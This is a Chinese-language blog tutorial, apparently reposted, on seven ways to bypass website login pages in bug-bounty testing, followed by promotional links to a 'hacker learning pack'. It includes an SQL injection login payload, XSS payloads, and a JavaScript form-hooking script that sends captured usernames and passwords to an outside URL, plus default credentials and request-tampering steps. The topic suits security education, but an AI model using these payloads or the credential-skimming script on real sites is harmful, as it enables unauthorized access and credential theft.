SRC绕过登录页面的七种常见方法,(非常详细)从零基础到精通,收藏这篇就够了!

最新推荐文章于 2025-05-20 20:00:04 发布
最新推荐文章于 2025-05-20 20:00:04 发布
阅读量888 收藏 19
点赞数 17
文章标签: 运维 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Libra1313/article/details/147956966
版权

常见的七种方式

绕过 SQL 注入

通过跨站点脚本(XSS)

通过操纵响应返回包

绕过爆破攻击限制

绕过目录爆破攻击

默认凭据绕过

通过删除请求中的参数

绕过 SQL 注入

Mutillidae 为例进行演示

所以现在我们可以将 SQL 注入payload放入其中。对于这个语法错误,payload是“ ’ or 1=1–” 现在让我们看看输入它时会发生什么。

我们以管理员身份登录。在您的情况下,当它不起作用时尝试其他payload,并使用 SQLMap 工具dump用户名和密码。

通过跨站点脚本(XSS)

输入 xss payload <script>alert(1)</script>并显示弹出窗口,因此您可以通过 XSS 尝试 CSRF 并查看受害者凭据。这是它的 CSRF payload

<script>  
function intercept() {  
  
var user = document.forms[0].elements[0].value;  
var pass = document.forms[0].elements[1].value;  
  
  
var xhr = new XMLHttpRequest();  
  
xhr.open("GET", "https://your-target-url?username/email="+user+"&password="+pass)  
xhr.send();  
return false;  
}  
document.forms[0].onsubmit = intercept;  
  
</script>

通过操纵响应返回包

该方法主要基于Response Status代码操作和Response Body操作。

首先在你的目标上创建一个帐户,然后使用正确的凭据登录并拦截 burp suite中的请求并分析响应,然后你尝试使用错误的凭据登录并使用正确的凭据操作你看到的响应,例如

403 Forbidden  
<redacted>  
{"error":true, "message":"Invalid Token"}

200 OK  
<redacted>  
{"success":true}

如果存在此漏洞,你将立即登录进去。

绕过爆破攻击限制

这种攻击主要发生在站点没有设置时间限制和重复次数限制,基本上没有在登录页面设置延时功能的情况下。

当您反复输入错误的凭据时,网站会显示 5 分钟后输入凭据的时间。当站点显示这种错误时,很难执行此方法。

绕过目录模糊攻击

在这种方法中,我们尝试借助一些工具(如 ffuf、dirbuster 和 burp suite intruder 等)进行目录暴力破解。大多数工具都有自己的目录词表,但当它没有词表时,所以在 linux 中它有自己的词表,你可以使用它们适用于 Windows,您可以在谷歌上搜索。

在这种攻击中,工具可以找到显示有用响应的任何目录或子目录,或者打开任何仅在您登录站点时打开的页面。我在这个博客中使用了 FFUF 工具,您可以看到它是如何工作的。

默认凭据绕过

当开发人员创建站点时,他会创建一些用于测试的默认凭据,但很多时候他会删除它,或者很多时候他不会将其从记录中删除。

当站点允许输入任何密码时,许多用户可以输入弱密码并且站点接受它。因此,您应该尝试使用默认凭据。默认凭据列表在 Google 上变得很容易获得。默认凭据,

如 admin:admin、admin:password、username:pass12345 等。

通过删除请求中的参数

当您输入错误的凭据时,网站会显示错误,例如用户名和密码不正确/不匹配,此用户名的密码不正确等,网站会显示此类响应,因此可以尝试此方法。

首先拦截请求并删除请求中的密码参数并转发请求。然后服务器发现该用户名可用并让您登录该站点。

当服务器没有正确分析请求时会出现此问题。

来源:https://www.freebuf.com/

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

黑客大白
关注
网络安全从入门到精通(特别I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 979
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
WebGL 从入门到精通
candy的博客
11-14 4039
WebGL 是一个强大的在网页上实现 3D 图形渲染的技术。从入门到精通需要逐步掌握其基本概念、进阶技巧和高级应用。通过不断学习和实践,利用丰富的学习资源,包括官网、API 文档、书籍和学习网站等,可以深入理解 WebGL 的原理和应用。在实际开发中,无论是游戏开发、数据可视化还是虚拟展厅等领域,WebGL 都有着广阔的应用前景,值得开发者深入探索和学习。同时,随着浏览器技术的不断发展,WebGL 也在不断改进和完善,为开发者带来更多的可能性。
SRC绕过登录页面七种常见方法,从零基础精通收藏了!
bdfcfff77fa的博客
03-05 844
大多数工具都有自己的目录词表,但当它没有词表时,所以在 linux 中它有自己的词表,你可以使用它们适用于 Windows,您可以在谷歌上搜索。首先在你的目标上创建一个帐户,然后使用正确的凭据登录并拦截 burp suite中的请求并分析响应,然后你尝试使用错误的凭据登录并使用正确的凭据操作你看到的响应,例如。当您输入错误的凭据时,网站会显示错误,例如用户名和密码不正确/不匹配,此用户名的密码不正确等,网站会显示此类响应,因此可以尝试此方法。当您反复输入错误的凭据时,网站会显示 5 分钟后输入凭据的时间。
iframe嵌入页面实现免登录思路(以vue为例)
talentT的博客
03-27 4884
最近实现一个功能需要使用iframe嵌入其它系统内部的一个页面,但嵌入后出现一个问题,就是一打开这个页面就会自动跳转到登录页,原因是被嵌入系统没有登录(没有token)肯定不让访问内部页面的,本文就是解决这个问题的。
深入理解HTML5密码输入框及其实现demo
weixin_33205138的博客
12-04 1072
本文还有配套的精品资源,点击获取 简介:本文将详细介绍HTML5中密码输入框的设计与实现,包括如何使用 <input> 标签创建密码输入控件、切换显示与隐藏密码、自定义CSS样式、应用HTML5的验证属性、支持响应式设计,并考虑到安全性的最佳实践。示例代码将贯穿讲解,帮助理解如何构建功能齐全、界面友好的密码输入框。 1. HTML5 ...
SRC绕过登录页面七种常见方法,(非常详细)从零基础精通收藏了!_download攻防绕过登陆
yy1715713348的博客
05-20 833
大多数工具都有自己的目录词表,但当它没有词表时,所以在 linux 中它有自己的词表,你可以使用它们适用于 Windows,您可以在谷歌上搜索。首先在你的目标上创建一个帐户,然后使用正确的凭据登录并拦截 burp suite中的请求并分析响应,然后你尝试使用错误的凭据登录并使用正确的凭据操作你看到的响应,例如。当您输入错误的凭据时,网站会显示错误,例如用户名和密码不正确/不匹配,此用户名的密码不正确等,网站会显示此类响应,因此可以尝试此方法。当您反复输入错误的凭据时,网站会显示 5 分钟后输入凭据的时间。
SRC实战 | 逻辑漏洞-前端验证绕过,从零基础精通收藏了!
Javachichi的博客
02-19 608
之后,如下图点击提交,修改retrieveId为12,attachmentUuid为上面文件的uuid值34a8952e-7d3a-4c1e-8862-cb1a83d64921。:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」
SSRF绕过方法总结,从零基础精通收藏了!
leah126的博客
02-27 919
这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」也有看到利用http://0000::1:80/的,但是我测试未成功。因幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因幅有限,仅展示部分资料,需要点击下方链接即可前往获取。木马免杀问题与防御********必知必会。也不一定是上传,我也说不清,自己体会 -
绕过登录的万能密码 SQL 注入,从零基础精通收藏了!
Libra1313的博客
02-28 1844
Portswigger练兵场之SQL注入之SQL 注入-绕过登录的万能密码。
技战法:重构PHP涉网犯罪后台登录绕过,从零基础精通收藏了!
Libra1313的博客
02-28 800
如今较新的网站在 PHP 版本较高的情况下,为提升安全性,往往会将后台页面文件 admin.php 重命名为不规则的文件名,以此达到隐藏后台文件的效果。在一般的PHP网站开发过程中,代码主要写在 “application” 文件夹中,通常会分为前台和后台两个部分。其中,前台一般放置在 “index” 模块中,而后台则一般放在 “admin” 模块中,注意本文是二开cms。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细零基础入门到精通收藏这一
xiangxue888的博客
09-09 1796
什么是CSRF?CSRF漏洞原理攻击与防御(非常详细零基础入门到精通收藏这一
【TMC5160驱动优化】:从基础到精通的配置秘籍
本文系统地介绍了TMC5160驱动的应用与配置,探讨了其在不同设备中的性能调优和故障诊断方法。文章首先概述了TMC5160驱动的基础配置,包括硬件接口、软件初始化以及配置工具的使用。随后,深入分析了微步细分技术、加...
【ASP.NET安全升级】:从入门到精通,一步步构建现代登录注册系统
[【ASP.NET安全升级】:从入门到精通,一步步构建现代登录注册系统](https://aglowiditsolutions.com/wp-content/uploads/2022/03/DOTNET-Security.png) # 摘要 随着网络应用的不断扩展,ASP.NET作为开发平台在Web...
Serverless 应用的运维:监控、日志与问题排查
weixin_42587823的博客
05-17 991
经过前面的学习和实践,代码跑起来了,API 也能访问了,是不是感觉可以高枕无忧了?等等!一个常见的误解是 Serverless 等于 “NoOps” (无运维)。实际上,这并非完全正确。虽然你摆脱了繁琐的服务器管理(打补丁、扩容、监控 CPU/内存使用率等),但应用的健康运行、性能优化、问题排查等。我们通常称之为 “LessOps” (更少运维) 或者 “DifferentOps” (不同的运维)。在 Serverless 世界里,运维的重心从转向了。
探索nsupdate:动态DNS更新的终极指南
言之。
05-20 415
`nsupdate` 是一个非常强大的命令行工具,用于向 DNS 服务器提交**动态 DNS (DDNS) 更新**。它允许你以编程方式或手动方式添加、删除或修改 DNS 区域文件中的资源记录 (RR),而无需手动编辑区域文件并重新加载区域。
操作系统-对空闲磁盘块的管理
一寸一寸光阴
05-17 1059
记录一下,但是记录了我会会吗。。。。。。。。。
day 23
2403_89660238的博客
05-16 194
Workstation Pro 可根据需要创建虚拟交换机,最多能在 Windows 主机系统上创建 20 个虚拟交换机,您可以 将任意数量的虚拟网络设备连接到 Windows 主机系统的虚拟交换机。仅主机模式: ip地址可以通过vmnetdhcp服务自动分配,网段也可以自己指定 可以自己手动配置一个和vmnet1网卡在同一个网段的地址不能上网。如果有线网卡或者无线网卡所在网段地址能上网,那么获得该ip的虚拟机也可以上网。如果有线网卡或者无线网卡能上网,该模式下的网卡也能上网;
【Auto-dl ssh隧道,TensorBoard】
最新发布
weixin_52881828的博客
05-20 158
本文介绍了如何通过Auto-dl SSH隧道使用TensorBoard的步骤。首先,用户需要点击自定义服务并下载Autodl-ssh-tools。接着,运行该工具并填入SSH指令和密码,启动代理。然后,在Auto-dl终端中找到.tevent文件所在的目录路径,并输入TensorBoard启动命令。最后,通过访问http://127.0.0.1:6006/即可成功使用TensorBoard。整个过程简单明了,适合需要远程监控深度学习训练过程的用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值